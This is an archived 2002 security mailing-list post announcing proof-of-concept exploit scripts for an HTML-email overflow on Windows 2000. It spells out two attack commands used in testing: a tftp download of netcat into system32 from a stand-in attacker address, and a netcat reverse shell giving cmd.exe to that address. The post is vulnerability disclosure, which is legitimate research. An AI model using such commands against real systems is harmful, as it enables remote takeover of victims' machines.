From: Gary O'leary-Steele (garyo@sec-1.com)
Date: Mon Aug 12 2002 - 11:22:10 EDT
Hello all,
For some reason my previous posts did not make it onto security focus ?-)
The following is a link to proof of concept code /exploit code for this
overflow. The shell code is relatively small but effective if used
correctly. The perl script takes a command to execute (WinExec,SW_HIDE) and
a html output file. There are two versions included in the zip.
HelpMe.pl // Was written to work with my machine Kernel32.dll version
5.0.2195.4272 (Rare ?)
HelpMe2.pl // Was written to work with all other machines I tested.
kernel32.dll version 5.0.2195.2778
I have tested the exploit using two html emails.
email 1 Executes tftp.exe -i my.ip.address get nc.exe
c:\winnt\system32\nc.exe
email 2 Executes nc.exe my.ip.address 80 -e cmd.exe
If the exploit executes correctly exitprocess()is called so no error occurs.
Kind Regards
Gary O'leary-Steele
XScan Team
www.Sec-1.com
----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/
This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:24 EDT